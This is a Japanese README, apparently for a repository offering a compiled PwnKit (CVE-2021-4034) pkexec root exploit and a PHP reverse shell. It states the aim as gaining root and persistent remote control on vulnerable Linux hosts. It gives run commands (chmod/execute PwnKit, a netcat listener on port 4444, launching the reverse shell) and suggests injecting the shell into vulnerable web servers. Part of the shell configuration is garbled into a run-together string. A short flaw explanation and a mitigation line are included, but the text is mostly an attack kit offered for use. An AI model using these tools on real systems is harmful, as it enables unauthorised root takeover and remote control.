
⚠️ 免責事項: このリポジトリは教育およびセキュリティ研究の目的でのみ作成されています。作者はこれらのツールの不正使用について一切責任を負いません。管理された環境、または明示的な許可がある環境でのみ使用してください。
このリポジトリには、Polkit の pkexec コンポーネントにおけるローカル権限昇格の重大な脆弱性である PwnKit (CVE-2021-4034) 用にコンパイルされた概念実証 (PoC) が含まれています。さらに、PHP 製リバースシェルスクリプトも含まれており、エクスプロイト成功後に展開するか、初期アクセスベクトルとして使用できます。
脆弱な Linux システムで root アクセスを獲得し、リバースシェルを介して永続化またはリモートコントロールを確立することです。
PwnKit (ELF バイナリ)CVE-2021-4034 用にコンパイルされたエクスプロイトです。
pkexec の環境変数を操作して悪意のある共有ライブラリを読み込み、root としてコードを実行します。pkexec がインストールされている必要があります。reverseShell.phpリバース接続を確立するための軽量ペイロードです。
192.168.1.84444/bin/bashphp reverseShell.php) で実行するか、脆弱な Web サーバーに注入して実行できます。PwnKit を標的のシステムに転送します。chmod +x PwnKit
./PwnKit
nc -lvnp 4444
reverseShell.php を編集します。php reverseShell.php
この脆弱性は、pkexec がコマンドライン引数を処理する方法に存在します。空の引数リストを渡すと、pkexec が境界外の argv[1] にアクセスしようとし、攻撃者がメモリ上の環境変数を上書きできるようになります。具体的には、悪意のある GCONV_PATH 変数を注入して実行フローを乗っ取ります。
このエクスプロイトから保護するには:
chmod 0755 /usr/bin/pkexec
ハッピーハッキング! 🏴☠️